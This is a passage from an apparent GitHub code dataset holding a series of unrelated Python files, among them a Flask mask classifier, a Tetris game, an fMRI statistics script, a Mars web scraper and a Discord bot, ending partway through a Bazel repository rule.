\"E:/projects/comvistugas2/tmp/dataset\"\n CLASS_MODE = 'categorical'\n COLOR_MODE = 'grayscale'\n\n BATCH_SIZE = 10\n TARGET_SIZE = (32, 32)\n\n dataset_generator = ImageDataGenerator(\n rescale=1. / 255,\n rotation_range=0.2,\n validation_split=0.2,\n zoom_range=0.2\n )\n\n train_set = dataset_generator.flow_from_directory(\n ROOT_PATH,\n target_size=TARGET_SIZE,\n batch_size=BATCH_SIZE,\n color_mode=COLOR_MODE,\n class_mode=CLASS_MODE,\n subset='training'\n )\n\n upload = request.files[\"image\"]\n\n pathImage = \"E:/projects/comvistugas2/uploads\"\n imageUploadName = \"original_image.jpg\"\n\n fileNameSplit = upload.filename.split('.')\n image.filename = imageUploadName\n\n upload.save(os.path.join(pathImage, imageUploadName))\n\n img = image.load_img(pathImage + \"/\" + imageUploadName, target_size=TARGET_SIZE, color_mode=\"grayscale\")\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n\n model = keras.models.load_model(\"comvismodel.h5\")\n\n images = np.vstack([x])\n classes = model.predict(images)\n predicted_index = np.argmax(classes)\n\n print(classes)\n print(predicted_index)\n\n result = \"\"\n\n baseUrl = \"\"\n if classes[0][predicted_index] > .5:\n if predicted_index == train_set.class_indices[\"masker\"]:\n print('Masker')\n result = \"Masker\"\n elif predicted_index == train_set.class_indices[\"nomasker\"]:\n result = \"Tidak Pakai Masker\"\n print('Tidak Pakai Masker')\n else:\n result = \"Masih gak yakin\"\n print(\"Index out of range\")\n else:\n print(\"Tidak yakin dengan gambar apa yang dikirim\")\n result = \"Masih gak yakin\"\n\n return render_template(\"index.html\", result=result)\n\n\n@app.route('/training-data')\ndef traindata():\n ROOT_PATH = \"E:/projects/comvistugas2/tmp/dataset\"\n CLASS_MODE = 'categorical'\n COLOR_MODE = 'grayscale'\n\n BATCH_SIZE = 15\n TARGET_SIZE = (48, 48)\n\n EPOCH = 30\n\n dataset_generator = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.3,\n rotation_range=0.3,\n validation_split=0.2,\n zoom_range=0.2\n )\n\n validation_generator = ImageDataGenerator(\n rescale=1. / 255,\n validation_split=0.2\n )\n\n train_set = dataset_generator.flow_from_directory(\n ROOT_PATH,\n target_size=TARGET_SIZE,\n batch_size=BATCH_SIZE,\n color_mode=COLOR_MODE,\n class_mode=CLASS_MODE,\n subset='training'\n )\n\n validation_set = validation_generator.flow_from_directory(\n ROOT_PATH,\n target_size=TARGET_SIZE,\n batch_size=BATCH_SIZE,\n color_mode=COLOR_MODE,\n class_mode=CLASS_MODE,\n subset='validation',\n shuffle=False\n )\n\n train_set.class_indices\n\n model = Sequential([\n Conv2D(64, (3, 3), input_shape=(TARGET_SIZE[0], TARGET_SIZE[1], 1), activation='relu'),\n Dropout(0.2),\n Flatten(),\n Dense(32, activation='relu'),\n Dropout(0.2),\n Dense(16, activation='relu'),\n Dense(2, activation='softmax')\n ])\n\n optimizer = SGD(learning_rate=0.1)\n model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\n model.summary()\n\n model.fit(\n train_set,\n epochs=EPOCH,\n validation_data=validation_set\n )\n\n model.save(\"modelcomvisbaru.h5\")\n\n\n","repo_name":"Lukmannudin/TubesComputerVision","sub_path":"blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15541059639","text":"from random import shuffle\nfrom pylernkarten.commands import command\n\n_questions = [\n\"\"\"- Was kostet denn ___ Schrank\n- ___ kostet 799 euro.\n\"\"\"\n]\n\ndef parse_question(text):\n text = text.split('___')\n elements = []\n for i in range(0, len(text)):\n elements.append(('text', text[i]))\n elements.append(('filler',[]))\n\n elements.pop()\n\n result = []\n for element in elements:\n elem_type, value = element\n if elem_type != 'text' or '\\n' not in value:\n result.append(element)\n continue\n\n lines = value.split('\\n')\n \n for line in lines:\n result.append(('text', line))\n result.append(('newline',))\n \n result.pop()\n\n return [ element for element in result if element[0] != 'text' or (element[0] == 'text' and element[1] != \"\")]\n \n\n@command\ndef question(number):\n return parse_question(_questions[int(number)])\n","repo_name":"danilomo/PyLernkarten","sub_path":"pylernkarten/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20409451295","text":"# coding: utf-8\nimport pandas as pd\n\n# 读取气象数据\ntmp = pd.read_csv(\n u'47891_高松.csv',\n parse_dates={'date_hour': [\"日期\"]},\n index_col=\"date_hour\",\n na_values=\"×\"\n)\n\ndel tmp[\"时间\"] # [时间]的列不使用,所以删除\n\n# 列的名字中不要带有日语,所以仅把接下来要使用的列的名字修改成英语\ncolumns = {\n \"降水量(mm)\": \"rain\",\n \"气温(℃)\": \"temperature\",\n \"日照时间(h)\": \"sunhour\",\n \"湿度(%)\": \"humid\",\n}\ntmp.rename(columns=columns, inplace=True)\n\n# -- 可视化 --\nimport matplotlib.pyplot as plt\n\nplt.figure(figsize=(10, 6))\n\n# 生成图表\n\nplt.hist(tmp['temperature'], bins=50, color=\"gray\")\nplt.xlabel('Temperature(C degree)')\nplt.ylabel('count')\n\n# 保存图表\nplt.savefig('7-4-1-4-graph.png')\n","repo_name":"whlll-coder/Python-ML","sub_path":"PythonCode/07/7-4-1-4-graph.py","file_name":"7-4-1-4-graph.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26916709248","text":"import csv\n\ninfile = open('customers.csv','r')\n\ncsvfile = csv.reader(infile,delimiter=',')\n\noutfile = open('customer_country.csv','w')\nnext(csvfile)\nwriter = csv.writer(outfile)\nheader = ['Full Name', 'Country']\nwriter.writerow(header)\ncount = 0\n\nfor record in csvfile:\n First_Name = record[1]\n Last_Name = record[2]\n Country = record[4]\n data = [\n [First_Name + ' ' + Last_Name , Country]\n ]\n writer.writerows(data)\n count = count + 1\n\nprint(count)\noutfile.close()","repo_name":"lukehankins3/readandwritefiles","sub_path":"customer_country.py","file_name":"customer_country.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30581664711","text":"import pygame\n\nfrom games.tetris.Tetris import Tetris, STATE_RUNNING, STATE_GAME_OVER\n\nTILE_SIZE = 20\n\nCOLOR_WHITE = (255, 255, 255)\nCOLOR_RED = (255, 0, 0)\nCOLOR_GREEN = (0, 128, 0)\nCOLOR_BLUE = (0, 0, 255)\nCOLOR_YELLOW = (255, 255, 0)\nCOLOR_FUCHSIA = (255, 0, 255)\nCOLOR_LIME = (0, 255, 0)\nCOLOR_NAVY = (0, 0, 128)\n\nFIGURE_COLORS = [COLOR_RED, COLOR_GREEN, COLOR_BLUE, COLOR_YELLOW, COLOR_FUCHSIA, COLOR_LIME, COLOR_NAVY]\n\n\ndef color_tile(screen, x, y, color):\n pygame.draw.rect(\n screen,\n color,\n [x * TILE_SIZE, y * TILE_SIZE, TILE_SIZE, TILE_SIZE]\n )\n\n\ndef draw_current_figure(screen, game: Tetris):\n figure = game.current_figure\n\n for y_offset in range(figure.height):\n for x_offset in range(figure.width):\n if figure.is_occupied(x_offset, y_offset):\n color_tile(screen, figure.x + x_offset, figure.y + y_offset, FIGURE_COLORS[figure.color - 1])\n\n\nif __name__ == \"__main__\":\n game = Tetris(15, 20)\n\n screen_width = game.width * TILE_SIZE\n screen_height = game.height * TILE_SIZE\n\n pygame.init()\n screen = pygame.display.set_mode((screen_width, screen_height))\n pygame.display.set_caption(\"TETRIS\")\n\n fps = 5\n clock = pygame.time.Clock()\n\n running = True\n\n while running:\n screen.fill(COLOR_WHITE)\n\n # draw current board state\n for y in range(game.height):\n for x in range(game.width):\n if game.is_occupied(x, y):\n color_tile(screen, x, y, FIGURE_COLORS[game.get_state(x, y) - 1])\n\n if game.current_state == STATE_RUNNING:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n running = False\n elif event.key == pygame.K_r:\n game.rotate_current_figure()\n elif event.key == pygame.K_a:\n game.move_left()\n elif event.key == pygame.K_d:\n game.move_right()\n elif event.key == pygame.K_s:\n game.move_down()\n\n draw_current_figure(screen, game)\n game.move_down()\n\n elif game.current_state == STATE_GAME_OVER:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n game.reset()\n\n font = pygame.font.SysFont(None, 50, bold=True)\n text = font.render('GAME OVER', True, COLOR_RED)\n text_rect = text.get_rect(center=(screen_width / 2, screen_height / 2))\n screen.blit(text, text_rect)\n\n pygame.display.flip()\n clock.tick(fps)\n\n","repo_name":"theowieland/MachineLearning","sub_path":"games/tetris/TetrisDrawer.py","file_name":"TetrisDrawer.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72710095555","text":"# %%\n'''\nSplits patients into medicated and non-medicated\nReruns the behavioural and glm analyses\n\n\n'''\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport pingouin as pg\nfrom functions.data_helpers import get_phenotype, get_task_beh_data\nfrom functions.data_helpers import get_computer\n\nsubj_list = list(np.loadtxt('subject_list_exclusions.txt', dtype='str'))\ndf = get_phenotype(subj_list)\ndf['medgroup'] = df['group'] + '-' + df['Medicated']\n\n# % Behavioural analysis\ntask_df = get_task_beh_data(subj_list, ratings_only=True)\ntask_df['medgroup'] = np.nan\n\n# populate the task data df with the new groups\nfor subj in task_df.participant_id.unique():\n new_group_value = df.loc[df.participant_id == subj, 'medgroup'].values[0]\n task_df.loc[task_df.participant_id == subj, 'medgroup'] = new_group_value\n \n# quick and dirty plots\ntmp = task_df[task_df.rating_measure == 'valence']\nsns.catplot(data=tmp, kind='bar', x='trial_type', y='rating', hue='medgroup',\n col='phase')\nplt.show()\n\ntmp = task_df[task_df.rating_measure == 'arousal']\nsns.catplot(data=tmp, kind='bar', x='trial_type', y='rating', hue='medgroup',\n col='phase')\nplt.show()\n\n# statistical analysis\n# comparing medicated and unmedicated patients\ngroup_idx = df.medgroup\nres_df = pd.DataFrame()\nfor label in ['arousal', 'valence']:\n xdf = task_df[task_df.rating_measure == label]\n\n # safety rev\n srev = ((xdf.loc[(xdf.phase == 'reversal')\n & (xdf.trial_type == 'CS-')].rating.values)\n - (xdf.loc[(xdf.phase == 'conditioning')\n & (xdf.trial_type == 'CS+')].rating.values))\n # threat rev\n trev = ((xdf.loc[(xdf.phase == 'reversal')\n & (xdf.trial_type == 'CS+')].rating.values)\n - (xdf.loc[(xdf.phase == 'conditioning')\n & (xdf.trial_type == 'CS-')].rating.values))\n\n # do a between t-test srev\n res = pg.ttest(srev[group_idx == 'patient-Medicated'],\n srev[group_idx == 'patient-Unmedicated'])\n res['measure'] = label\n res['contrast'] = 'Safety reversal'\n res['test'] = 'Two sample'\n res_df = pd.concat([res_df, res])\n\n # do a between t-test ttrev\n res = pg.ttest(trev[group_idx == 'patient-Medicated'],\n trev[group_idx == 'patient-Unmedicated'])\n res['measure'] = label\n res['contrast'] = 'Threat reversal'\n res['test'] = 'Two sample'\n res_df = pd.concat([res_df, res])\nprint(res_df.head())\n\n# % activation analysis...\n\n# paths\n_, proj_dir = get_computer()\nbids_dir = proj_dir+'data/bids/'\nderiv_dir = proj_dir+'data/derivatives/post-fmriprep-fix/'\nroi_dir = proj_dir+'data/derivatives/masks/'\nfig_dir = '../../figures/'\nbg_img = (proj_dir + 'data/derivatives/masks/'\n + 'tpl-MNI152NLin2009cAsym_res-01_desc-brain_T1w.nii.gz')\n\n# beta extraction method\nmethod = 'region'\neroded = False\n\n# sphere radius size\nradius = 4\n\n# glm analysis stream to use\nglm_label = 'smooth-6mm_despike'\n\n# roi information for plotting and statistics\nroi_dict = {'Insula (L)': {'contrast': 'Threat',\n 'label': ['leftInsula'],\n 'files': [roi_dir+'Savage_threat_leftInsula.nii.gz']\n },\n 'Insula (R)': {'contrast': 'Threat',\n 'label': ['rightInsula'],\n 'files': [roi_dir+'Savage_threat_rightInsula.nii.gz']\n },\n 'dACC': {'contrast': 'Threat',\n 'label': ['acc'],\n 'files': [roi_dir+'Savage_threat_acc.nii.gz']\n },\n 'vmPFC': {'contrast': 'Safety',\n 'label': ['vmpfc'],\n 'files': [roi_dir+'Savage_safety_vmpfc.nii.gz']\n },\n 'PCC': {'contrast': 'Safety',\n 'label': ['pcc'],\n 'files': [roi_dir+'Savage_safety_pcc.nii.gz']\n },\n 'Putamen (L)': {'contrast': 'Threat',\n 'label': ['leftPUT'],\n 'files': [roi_dir+'tian_threat_leftPUT.nii.gz']\n },\n 'Putamen (R)': {'contrast': 'Threat',\n 'label': ['rightPUT'],\n 'files': [roi_dir+'tian_threat_rightPUT.nii.gz']\n },\n 'Caudate (L)': {'contrast': 'Threat',\n 'label': ['leftCAU'],\n 'files': [roi_dir+'tian_threat_leftCAU.nii.gz']\n },\n 'Caudate (R)': {'contrast': 'Threat',\n 'label': ['rightCAU'],\n 'files': [roi_dir+'tian_threat_rightCAU.nii.gz']\n },\n 'GP (L)': {'contrast': 'Threat',\n 'label': ['leftGP'],\n 'files': [roi_dir+'tian_threat_leftGP.nii.gz']\n },\n 'GP (R)': {'contrast': 'Threat',\n 'label': ['rightGP'],\n 'files': [roi_dir+'tian_threat_rightGP.nii.gz']\n }\n }\n\nresults_df = pd.DataFrame()\nfor subj in subj_list:\n if eroded:\n xdf = pd.read_csv(deriv_dir+'spm_group/glm_'+glm_label\n + '/extracted_betas/'+subj+'_Savage_'+str(radius)+'mm_eroded.csv')\n else:\n xdf = pd.read_csv(deriv_dir+'spm_group/glm_'+glm_label\n + '/extracted_betas/'+subj+'_Savage_'+str(radius)+'mm.csv')\n results_df = pd.concat([results_df, xdf])\n\n if eroded:\n xdf = pd.read_csv(deriv_dir+'spm_group/glm_'+glm_label\n + '/extracted_betas/'+subj+'_tian_'+str(radius)+'mm_eroded.csv')\n else:\n xdf = pd.read_csv(deriv_dir+'spm_group/glm_'+glm_label\n + '/extracted_betas/'+subj+'_tian_'+str(radius)+'mm.csv')\n results_df = pd.concat([results_df, xdf])\n\n# Do statistics\nstat_df = pd.DataFrame()\n\n# regions to include in statistical analysis\nroi_list = ['Insula (L)',\n 'Insula (R)',\n 'dACC',\n 'vmPFC',\n 'PCC',\n 'Putamen (L)',\n 'Putamen (R)',\n 'Caudate (L)',\n 'Caudate (R)',\n 'GP (L)',\n 'GP (R)'\n ]\n\n# add the new groups to the activation dataframe\nfor subj in results_df.subj.unique():\n new_group_value = df.loc[df.participant_id == subj, 'medgroup'].values[0]\n results_df.loc[results_df.subj == subj, 'medgroup'] = new_group_value\n\nfor roi_label in roi_list:\n\n # get info from dict\n roi = roi_dict[roi_label]['label'][0]\n\n # get contrast data\n if roi_dict[roi_label]['contrast'] == 'Threat':\n contrast = 'Threat reversal'\n\n elif roi_dict[roi_label]['contrast'] == 'Safety':\n contrast = 'Safety reversal'\n\n # two sample t-test\n a = results_df.loc[(results_df.method == method)\n & (results_df.roi == roi)\n & (results_df.contrast == contrast)\n & (results_df.medgroup == 'patient-Medicated')].value.values\n\n b = results_df.loc[(results_df.method == method)\n & (results_df.roi == roi)\n & (results_df.contrast == contrast)\n & (results_df.medgroup == 'patient-Unmedicated')].value.values\n\n res = pg.ttest(a, b)\n res['roi'] = roi_label\n res['contrast'] = contrast\n res['test'] = '2samp'\n stat_df = pd.concat([stat_df, res])\n\n# perform multiple comparison correction\nstat_df['p-val-corrected'] = 1\nfor test in ['1samp', '2samp']:\n reject, pvals_corr = pg.multicomp(\n stat_df.loc[stat_df.test == test]['p-val'].values, method='fdr_by')\n stat_df.loc[stat_df.test == test, 'p-val-corrected'] = pvals_corr\n\n# print results\nfor i, row in stat_df.iterrows():\n print(row.roi, ':', row.contrast, ':', row.test,\n ': t=', np.round(row['T'], 2),\n ': p=', np.round(row['p-val-corrected'], 4))\n\n# stat_df.to_csv('../../results/ROI_mean_stats.csv')\n\n# Clean stat df\nclean_df = pd.concat([stat_df[stat_df.test == '1samp'],\n stat_df[stat_df.test == '2samp']])\nclean_df = clean_df[['test', 'roi', 'contrast', 'T', 'dof', 'cohen-d', 'p-val-corrected', 'BF10']]\nclean_df['T'] = clean_df['T'].round(2)\nclean_df.dof = clean_df.dof.round(2)\nclean_df['cohen-d'] = clean_df['cohen-d'].round(2)\nclean_df['p-val-corrected'] = clean_df['p-val-corrected'].round(4)\nclean_df['BF10'] = clean_df['BF10'].astype(\"float\")\nclean_df['BF10'] = clean_df['BF10'].round(2)\n# clean_df.to_csv('../../results/ROI_mean_stats_clean.csv')\n\n# %%\nclean_df.head(20)\n# %%\n","repo_name":"clinical-brain-networks/OCDBaseline_public","sub_path":"code/medication_control_analyses.py","file_name":"medication_control_analyses.py","file_ext":"py","file_size_in_byte":8777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35784893991","text":"#Code from https://github.com/Ghernandez1991/Flask-Mongodb\n#Thank you for your time Joe\n# Sempre ubi sub ubi!\n\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nimport pymongo\nfrom splinter import Browser\nimport time\n\n# starts up Chrome browser, headless and no extention as Mac Chrome does not need it\ndef start_browser():\n \n return Browser(\"chrome\", headless=False)\n\n#Let the scraping of websites begin!\ndef scrape ():\n browser = start_browser()\n mars_data = {}\n\n # visit the NASA Mars News site and scrape headlines\n nasa_url = 'https://mars.nasa.gov/news/'\n browser.visit(nasa_url)\n # takes URL and goes to browser to load webpage\n\n nasa_html = browser.html\n nasa_soup = BeautifulSoup(nasa_html, 'html.parser')\n # calls BeautifulSoup to parse of text of the browsed webpage\n\n list_of_news = nasa_soup.find('ul', class_='item_list')\n #finds unordered list in a class of item_list in html puts all this into list_of_news\n first_item_of_list = list_of_news.find('li', class_='slide')\n #finds listed item in a class of slide in list_of_news puts all this into first_item_of_list\n header = first_item_of_list.find('div', class_='content_title').text\n #finds div in a class of content_title puts the text into header\n synoposis = first_item_of_list.find('div', class_='article_teaser_body').text\n #finds div in a class of article_teaser_body puts the text into synoposis\n\n \n results1 = nasa_soup.find_all('li', class_=\"slide\")\n#finds all listed items in a class of slide puts the into results1\n\n mars_data[\"nasa_headline\"] = header\n #puts text of header into mars_data dictionary as nasa_headline\n mars_data[\"nasa_teaser\"] = synoposis\n #puts text of synoposis into mars_data dictionary as nasa_data\n\n\n #Visit the url for JPL Featured Space Image here.\n\n image_url = \"https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\"\n browser.visit(image_url)\n #takes URL and goes to browser to load webpage\n browser.click_link_by_partial_text('FULL IMAGE')\n# clicks hypertextlink to pull FUll Image of webpage first image\n\n\n expand = browser.find_by_css('a.fancybox-expand')\n expand.click()\n time.sleep(1)\n #stops the loading of an iframe\n\n image_url_html = browser.html\n image_soup = BeautifulSoup(image_url_html, 'html.parser')\n # calls BeautifulSoup to parse of text of the browsed webpage\n# grabbing down teh html text to find the latest photo of Mars\n img_relative_path = image_soup.find('img', class_='fancybox-image')['src']\n featured_image_url = f'https://www.jpl.nasa.gov{img_relative_path}'\n mars_data[\"feature_image_src\"] = featured_image_url\n\n #Visit the Mars Weather twitter account here and scrape the latest Mars weather tweet from the page.\n#Save the tweet text for the weather report as a variable called mars_weather.\n twitter_url = \"https://twitter.com/marswxreport?lang=en\"\n browser.visit(twitter_url)\n twitter_html = browser.html\n twitter_soup = BeautifulSoup(twitter_html, 'html.parser')\n # calls BeautifulSoup to parse of text of the browsed webpage\n tweets = twitter_soup.find('div', class_='stream')\n#Scrape twitter page for latest weather data\n for tweet in tweets:\n try:\n text_of_tweets = tweets.find('p', class_= \"tweet-text\").text\n #The time and date of article publication\n if(text_of_tweets):\n print('-----------------')\n print(text_of_tweets)\n \n \n \n #Tweet Title and text of tweet put into a dictionary\n # Dictionary to be inserted into MongoDB\n post = {\n 'Tweet Title': text_of_tweets\n }\n# Insert dictionary into MongoDB as a document\n collection1.insert_one(post)\n \n except AttributeError as e:\n print(e)\n tweet_link=e\n break \n mars_data[\"weather_summary\"] = tweet_link\n#this places the tweet into the Mongo db\n\n\n #Visit the Mars Facts webpage here and use Pandas to scrape the table containing facts about the planet including Diameter,\n\n mars_url = \"https://space-facts.com/mars/\"\n\n browser.visit(mars_url)\n \n mars1_html = browser.html\n mars1_soup = BeautifulSoup(mars1_html, 'html.parser')\n# calls BeautifulSoup to parse of text of the browsed webpage\n\n mars_table = mars1_soup.find('section', class_='sidebar widget-area clearfix')\n first_table = mars_table.find('table', class_='tablepress tablepress-id-p-mars')\n\n\n \n url5 = \"https://space-facts.com/mars/\"\n\n\n tables = pd.read_html(url5)\n \n #table 1 is the needed table \n tables[1]\n\n df = tables[1]\n df.columns = ['Identifier', 'Measurments']\n df\n mars_table_html = df.to_html(header=False, index=False)\n mars_data[\"fact_table\"] = mars_table_html\n#taking mars facts table into panda dataframe without headers and index into mars_table_html that is placed into Mongo DB mars_data blob\n\n #grabbing hemisphere1\n # looking for and grabbing a photo title and URL\n \n hemi_url = \"https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars\"\n\n browser.visit(hemi_url)\n browser.click_link_by_partial_text('Cerberus Hemisphere Enhanced')\n hemi_html = browser.html\n hemi_soup = BeautifulSoup(hemi_html, 'html.parser')\n\n hemi_list1 = hemi_soup.find ('div', class_= \"downloads\")\n \n cereberus = ''\n\n for a in hemi_list1('a', href=True):\n print (\"Found the URL:\", a['href'])\n cereberus=a['href']\n break\n\n #Grab hemi 2\n# looking for and grabbing a photo title and URL\n\n browser.visit(hemi_url)\n browser.click_link_by_partial_text('Schiaparelli Hemisphere Enhanced')\n hemi_html1 = browser.html\n hemi_soup1 = BeautifulSoup(hemi_html1, 'html.parser')\n\n hemi_list2 = hemi_soup1.find ('div', class_= \"downloads\")\n\n schiaparelli = ''\n\n for a in hemi_list2('a', href=True):\n print (\"Found the URL:\", a['href'])\n schiaparelli=a['href']\n \n break\n\n\n #find hemi 3\n # looking for and grabbing a photo title and URL\n browser.visit(hemi_url)\n browser.click_link_by_partial_text('Syrtis Major Hemisphere Enhanced')\n\n hemi_html2 = browser.html\n hemi_soup2 = BeautifulSoup(hemi_html2, 'html.parser')\n\n hemi_list3 = hemi_soup2.find ('div', class_= \"downloads\")\n\n syrtis = ''\n\n for a in hemi_list3('a', href=True):\n print (\"Found the URL:\", a['href'])\n syrtis=a['href']\n break\n\n # find hemisphere 4\n # looking for and grabbing a photo title and URL\n browser.visit(hemi_url)\n browser.click_link_by_partial_text('Valles Marineris Hemisphere Enhanced')\n\n hemi_html3 = browser.html\n hemi_soup3 = BeautifulSoup(hemi_html3, 'html.parser')\n\n hemi_list4 = hemi_soup3.find ('div', class_= \"downloads\")\n\n valles= ''\n\n for a in hemi_list4('a', href=True):\n print (\"Found the URL:\", a['href'])\n valles=a['href']\n break\n \n # saving locations URLS of 4 photos and their titles in a dictionary\n hemisphere_image_urls = [\n {\"title\": \"Valles Marineris Hemisphere\", \"img_url\": valles},\n {\"title\": \"Cerberus Hemisphere\", \"img_url\": cereberus},\n {\"title\": \"Schiaparelli Hemisphere\", \"img_url\": schiaparelli},\n {\"title\": \"Syrtis Major Hemisphere\", \"img_url\": syrtis},\n ]\n\n #Saving dictionary of URL and tittels in Mongo db\n mars_data[\"hemisphere_imgs\"] = hemisphere_image_urls","repo_name":"wolfbreeze/10WebScrape","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25521215258","text":"import os\nimport pysal\nimport numpy as np\n\nexamples = os.path.join(os.path.dirname(pysal.__file__), 'examples', 'us_income')\n\ninput_file = pysal.open(os.path.join(examples, 'usjoin.csv'))\npci = np.array([input_file.by_col[str(y)] for y in range(1929, 2010)])\npci = pci.transpose()\n\nweights = pysal.open(os.path.join(examples, \"states48.gal\")).read()\nmaxp = pysal.Maxp(weights, pci, floor=5, floor_variable=np.ones((48, 1)), initial=99)\n\nnames = input_file.by_col('Name')\nnames = np.array(names)\n\nfor region in maxp.regions:\n ids = list(map(int, region))\n print(\", \".join(names[ids]))\n","repo_name":"flaxandteal/python-course","sub_path":"011-geography/python/ps.py","file_name":"ps.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"10535704012","text":"print(\"*** PREGUNTA 1 ***\")\n#Crea una Función que reciba 2 String como parametros.\\n Que retorne 1 String de largo\n#Que contenga las 2 primeras letras del 1er string y las 2 últimas del segundo string\n\ndef mesclador(string_a, string_b):\n if len(string_a)<3 or len(string_b)<3 :\n print(\"El largo de las palabras a ingresar debe ser mayor a 2 caracteres\")\n else:\n uno=(string_a[:2])\n #print(uno)\n dos=(string_b[-2:])\n #print(dos)\n mix= uno + dos\n return mix\n#Prueba\n#print(\"\\nPrueba función mesclador string_a = hola, string_b = chao \")\nprint(mesclador(\"Funciones\",\"Strings\"))\n\nprint(\"\\n ***PREGUNTA 2***\")\n#Escriba una función que reciba dos strings como parámetros y retorne un nuevo string que consista del primero,\n#pero con el segundo string intercalado entre cada letra del primero.\ndef intercarlar(string_a,string_b):\n i=0\n largo =len(string_a)\n j= \"\"\n while iy[0]:\r\n\t\t\tmaplist[x[0]][x[1]]|=(1<<1)\r\n\t\t\tmaplist[y[0]][y[1]]|=(1<<0)\r\n\t\telif x[0]y[1]:\r\n\t\t\tmaplist[x[0]][x[1]]|=(1<<3)\r\n\t\t\tmaplist[y[0]][y[1]]|=(1<<2)\r\n\t\telif x[1]0:\r\n\t\tchoicelist=[]\r\n\t\tfor i in range(4):\r\n\t\t\tif 0<=now[0]+direct[i][0] max_:\n max_ = item\n pos_max = idx\nprint(f'min = {min_},\\nmax = {max_}')\n\nsum_ = 0\nfor idx, item in enumerate(array):\n if pos_min < idx < pos_max:\n print(item)\n sum_ += item\n elif pos_max < idx < pos_min:\n print(item)\n sum_ += item\nprint(f' Сумма элементов между минимальным и максимальным равна : {sum_}')\n","repo_name":"SergeyDuvanskiy/AlgorithmsInPython","sub_path":"Lesson_3/task_6.py","file_name":"task_6.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18022899305","text":"import discord\nfrom discord.ext import commands\nfrom discord import FFmpegPCMAudio\nfrom keys.apikey import *\nfrom profanity_check import predict\nimport requests, json\n\n# initialize bot\nintents = discord.Intents.default()\nintents.members = True\nintents.message_content = True\nclient = commands.Bot(command_prefix='!', intents=intents)\n\n# this function is executed when the bot is ready to receive commands\n@client.event\nasync def on_ready():\n print('The bot is ready for use')\n print('-------------------------')\n\n# when a user types !hello this function will run\n@client.command()\nasync def hi(ctx):\n url = \"https://dad-jokes.p.rapidapi.com/random/joke\"\n\n headers = {\n \"X-RapidAPI-Key\": JOKE_API,\n \"X-RapidAPI-Host\": \"dad-jokes.p.rapidapi.com\"\n }\n\n response = requests.get(url, headers=headers)\n\n joke = json.loads(response.text)['body']\n\n await ctx.send(f\"hi! \\n\\n{joke[0]['setup']}\\n\\n{joke[0]['punchline']}\")\n\n\n# detect when someone joins your server and send a message\n@client.event\nasync def on_member_join(member):\n channel = client.get_channel(CHANNEL_ID)\n await channel.send('Hello')\n\n# detect when someone leaves your server and send a message\n@client.event\nasync def on_member_remove(member):\n channel = client.get_channel(CHANNEL_ID)\n await channel.send('Goodbye')\n\n@client.command(pass_context=True)\nasync def join(ctx):\n if (ctx.author.voice):\n channel = ctx.message.author.voice.channel\n voice = await channel.connect()\n source = FFmpegPCMAudio('dog-barking.wav')\n player = voice.play(source)\n else:\n await ctx.send('You must be in a voice channel to run this command.')\n\n# if the bot is in a voice channel then it'll leave and send message\n@client.command(pass_context=True)\nasync def leave(ctx):\n if (ctx.voice_client):\n await ctx.guild.voice_client.disconnect()\n await ctx.send('I\\'ve left the voice channel')\n else:\n await ctx.send('I am not in a voice channel')\n\n# detecting specific words through events\n@client.event\nasync def on_message(message):\n if predict([message.content]) > 0:\n await message.delete()\n await message.channel.send('Don\\'t send that again')\n\n# link the bot to the web app (tells the bot to run)\nclient.run(BOT_TOKEN)\n\n","repo_name":"DonnovanJiles70122/Discord_Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11760041311","text":"def bazel_repositories(\n bazel_version,\n bazel_sha256,\n rules_go_version,\n rules_go_sha256,\n buildtools_version,\n buildtools_sha256,\n):\n native.http_archive(\n name=\"io_bazel\",\n sha256=bazel_sha256,\n strip_prefix=\"bazel-%s\" %\n bazel_version, # Should match current Bazel version\n urls=[\n \"http://bazel-mirror.storage.googleapis.com/github.com/bazelbuild/bazel/archive/%s.tar.gz\"\n % bazel_version,\n \"https://github.com/bazelbuild/bazel/archive/%s.tar.gz\" %\n bazel_version,\n ],\n )\n\n native.http_archive(\n name=\"io_bazel_rules_go\",\n sha256=rules_go_sha256,\n strip_prefix=\"rules_go-%s\" % rules_go_version, # branch master\n urls=[\n \"https://github.com/bazelbuild/rules_go/archive/%s.zip\" %\n rules_go_version\n ],\n )\n\n native.http_archive(\n name=\"com_github_bazelbuild_buildtools\",\n sha256=buildtools_sha256,\n strip_prefix=\"buildtools-%s\" % buildtools_version, # 